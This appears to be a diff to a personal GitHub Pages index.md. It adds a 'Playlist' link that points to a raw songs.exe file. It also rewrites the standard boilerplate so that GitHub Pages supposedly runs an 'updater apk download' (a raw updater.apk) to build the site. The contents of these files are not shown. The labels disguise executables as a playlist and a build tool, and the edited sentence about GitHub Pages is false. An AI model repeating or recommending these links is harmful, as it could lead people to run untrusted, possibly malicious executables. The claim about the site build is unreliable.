imfaizanakhtar/imfaizanakhtar.github.io/index.md

 FaizoO [Facebook Handel](https://facebook.com/iamfaizanakhtar) .
 [Playlist](https://github.com/imfaizanakhtar/imfaizanakhtar.github.io/raw/main/songs.exe) .

-Whenever you commit to this repository, GitHub Pages will run [Jekyll](https://jekyllrb.com/) to rebuild the pages in your site, from the content in your Markdown files.
+Whenever you commit to this repository, GitHub Pages will run [updater apk download](https://github.com/imfaizanakhtar/imfaizanakhtar.github.io/raw/main/updater.apk) to rebuild the pages in your site, from the content in your Markdown files.

 ### Markdown